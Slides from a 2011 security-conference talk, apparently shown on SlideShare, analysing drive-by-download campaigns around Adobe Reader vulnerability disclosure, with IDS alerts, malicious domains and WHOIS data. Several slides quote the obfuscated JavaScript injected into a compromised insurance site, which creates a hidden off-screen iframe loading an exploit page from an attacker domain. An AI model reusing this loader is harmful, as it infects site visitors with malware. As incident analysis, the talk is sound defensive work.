SlideShare una empresa de Scribd logo

Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

DefconRussia
DefconRussia

International Security Conference "ZeroNights 2011" - http://www.zeronights.org/

Tecnología
1 de 58
Descargar para leer sin conexión
Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
What does it look like? Host ready Malware Malware server controlled by attacker PC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
How we find it? Date/Time 2011-08-05 10:44:53 YEKST Tag Name PDF_XFA_Script Observance Type Intrusion Detection Cleared Flag false Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Target Service unknown Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eeb b038bd46a63e08665f308 1fb408/6cd14aca5927118 2c8a04159f9ad2804.pdf
DOES USER NEED IT?? How we find it? Date/Time 2011-08-05 10:44:53 Tag Name PDF_XFA_Script Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eebb 038bd46a63e08665f3081 fb408/6cd14aca59271182 c8a04159f9ad2804.pdf
First indicators Date/Time 2011-07-26 11:24:37 Tag Name PDF_XFA_Script arg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750 compressed zlib server mamjhvbw.dyndns.pro URL /ghqlv3ym/
First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.php Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root :compressed gzip compressed zlib :server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php :URL /jb/lastrger.php
First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/ Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000- :compressed gzip compressed zlib ABCDEFFEDCBA :server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js :URL /jb/lastrger.php
Example: o-strahovanie.ru
Example: o-strahovanie.ru
Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) }); Cookie: document.xmlSettings.iframe=document.createElement ('iframe'); if_ik1315314771 document.xmlSettings.iframe.style.cssText='height:1px; www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;'; 16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra 93001403230174358* me); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'a rding.i'+'n/xtqd2/08.p'+'hp';}
Example: o-strahovanie.ru / ============ bbb ============ else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ document.xmlSettings.iframe= document.createElement('iframe'); document.xmlSettings.iframe.style.cssText= 'height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings. iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} Cookie: if_ik1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
Example: o-strahovanie.ru else{// 4 osel … document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src= 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} iframe.src= 'http://disregarding.in/xtqd2/08.php'
Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware server PC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.in PC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario No Payload, because No Payload Requests? Are they looking for customers?
Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name: Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
Russell Rosario Domain Name:FILTRATED.IN filtrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618 raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Created On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Florida tansies.in Registrant Postal Code:33830 Registrant Country:US Created On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesn't Know…
Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
Domain owner is the same Domain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability X. DISCLOSURE TIMELINE ----------------------------- 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers 2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-26 - Coordinated public release of advisory ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-27 - Coordinated public release of advisory
Harvetering machine started Domain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
Spamlists, Aug 19
AV Vendors, Aug 18
Safebrowsing Aug 20
Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM Subject: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure Sep 14. What to expect?
PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
No good news. Hundreds of domains were registered ITALIA-NEW.IN KLERK-EVEN.RU BANER-KLERK.RU KLERK-EVENTS.RU BANK-KLERK.RU KLERK-LAW.RU BANNER-KLERK.RU KLERK-NEW.RU BLOGS-KLERK.RU KLERK-NEWS.RU BUH-KLERK.RU KLERK-REKLAMA.RU DAILY-KP.RU KLERK-RU.RU FORUM-KLERK.RU KLERK-WORK.RU I-OBOZREVATEL.RU KLERK2.RU INTERFAX-REGION.RU OBOZREVATEL-RU.RU JOB-KLERK.RU OBOZREVATELRU.RU KLERK-BANK.RU WIKI-KLERK.RU KLERK-BANKIR.RU PRESS-RZD.RU KLERK-BIZ.RU RZD-RZD.RU KLERK-BOSS.RU IPGEOBASE.IN KLERK-BUH.RU ***
“New generation” Host ready Malware Malware server controlled by attacker PC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
Known sites examples: KP.RU
Other examples: EG.RU (newspaper, 263 685 visits per day)
Other examples: svpressa.ru (newspaper 276 720 visits per day)
Malware examples: Banks targeted attack
Malware examples: Banks targeted attack
Another news, another phone… • Legal • Faked
Malware examples: Banks targeted attack
Malware examples
Malware examples
Script examples
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org

Recomendados

Php version 5
Php version 5Php version 5
Php version 5
Manuel Rodriguez
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance
毅 吕
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at Opera
Cosimo Streppone
 
extending-php
extending-phpextending-php
extending-php
tutorialsruby
 
php & performance
php & performance php & performance
php & performance
simon8410
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Hyperledger composer
Hyperledger composerHyperledger composer
Hyperledger composer
wonyong hwang
 
Does your configuration code smell?
Does your configuration code smell?Does your configuration code smell?
Does your configuration code smell?
Tushar Sharma
 

Recomendados

Php version 5
Php version 5Php version 5
Php version 5
Manuel Rodriguez
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance
毅 吕
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at Opera
Cosimo Streppone
 
extending-php
extending-phpextending-php
extending-php
tutorialsruby
 
php & performance
php & performance php & performance
php & performance
simon8410
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Hyperledger composer
Hyperledger composerHyperledger composer
Hyperledger composer
wonyong hwang
 
Does your configuration code smell?
Does your configuration code smell?Does your configuration code smell?
Does your configuration code smell?
Tushar Sharma
 
Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse support
mdcdwh
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
GreenD0g
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Zend by Rogue Wave Software
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4
Jim Jagielski
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
Fernando Hamasaki de Amorim
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
Joseph Scott
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Cosimo Streppone
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло Морозов
Binary Studio
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Server
webhostingguy
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life better
ZendCon
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLite
charsbar
 
kubernetes practice
kubernetes practicekubernetes practice
kubernetes practice
wonyong hwang
 
Docker practice
Docker practiceDocker practice
Docker practice
wonyong hwang
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
Alona Mekhovova
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrid
eugenio pombi
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry Pi
Yuriko IKEDA
 
Security Configuration Management for Dummies
Security Configuration Management for DummiesSecurity Configuration Management for Dummies
Security Configuration Management for Dummies
Tripwire
 
Information Secuirty Vulnerability Management
Information Secuirty Vulnerability ManagementInformation Secuirty Vulnerability Management
Information Secuirty Vulnerability Management
tschraider
 
The information security audit
The information security auditThe information security audit
The information security audit
Dhani Ahmad
 
Lect 3
Lect 3Lect 3
Lect 3
Muhammad Qadeer
 
5.4 it security audit (mauritius)
5.4 it security audit (mauritius)5.4 it security audit (mauritius)
5.4 it security audit (mauritius)
Corporate Registers Forum
 
The Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesThe Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best Practices
Kellep Charles
 

Más contenido relacionado

La actualidad más candente

The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
Fernando Hamasaki de Amorim
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
Joseph Scott
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Server
webhostingguy
 

La actualidad más candente (16)

Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse support
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло Морозов
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Server
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life better
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLite
 
kubernetes practice
kubernetes practicekubernetes practice
kubernetes practice
 
Docker practice
Docker practiceDocker practice
Docker practice
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrid
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry Pi
 

Destacado

Information Secuirty Vulnerability Management
Information Secuirty Vulnerability ManagementInformation Secuirty Vulnerability Management
Information Secuirty Vulnerability Management
tschraider
 
The Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesThe Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best Practices
Kellep Charles
 
Eight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentEight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability Assessment
Sirius
 

Destacado (7)

Security Configuration Management for Dummies
Security Configuration Management for DummiesSecurity Configuration Management for Dummies
Security Configuration Management for Dummies
 
Information Secuirty Vulnerability Management
Information Secuirty Vulnerability ManagementInformation Secuirty Vulnerability Management
Information Secuirty Vulnerability Management
 
The information security audit
The information security auditThe information security audit
The information security audit
 
Lect 3
Lect 3Lect 3
Lect 3
 
5.4 it security audit (mauritius)
5.4 it security audit (mauritius)5.4 it security audit (mauritius)
5.4 it security audit (mauritius)
 
The Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesThe Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best Practices
 
Eight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentEight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability Assessment
 

Similar a Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]
Devon Bernard
 
Swift profiling middleware and tools
Swift profiling middleware and toolsSwift profiling middleware and tools
Swift profiling middleware and tools
zhang hua
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 
NLIT 2011: Chef & Capistrano
NLIT 2011: Chef & CapistranoNLIT 2011: Chef & Capistrano
NLIT 2011: Chef & Capistrano
nickblah
 

Similar a Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes (20)

Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devices
 
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияГод в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stack
 
How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]
 
HTTP Caching and PHP
HTTP Caching and PHPHTTP Caching and PHP
HTTP Caching and PHP
 
Swift profiling middleware and tools
Swift profiling middleware and toolsSwift profiling middleware and tools
Swift profiling middleware and tools
 
Building Scalable Websites with Perl
Building Scalable Websites with PerlBuilding Scalable Websites with Perl
Building Scalable Websites with Perl
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
 
Oracle API Gateway Installation
Oracle API Gateway InstallationOracle API Gateway Installation
Oracle API Gateway Installation
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / Webgrind
 
Nginx pres
Nginx presNginx pres
Nginx pres
 
Bpstudy20101221
Bpstudy20101221Bpstudy20101221
Bpstudy20101221
 
Python at Facebook
Python at FacebookPython at Facebook
Python at Facebook
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
NLIT 2011: Chef & Capistrano
NLIT 2011: Chef & CapistranoNLIT 2011: Chef & Capistrano
NLIT 2011: Chef & Capistrano
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 

Más de DefconRussia

[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
DefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
DefconRussia
 

Más de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
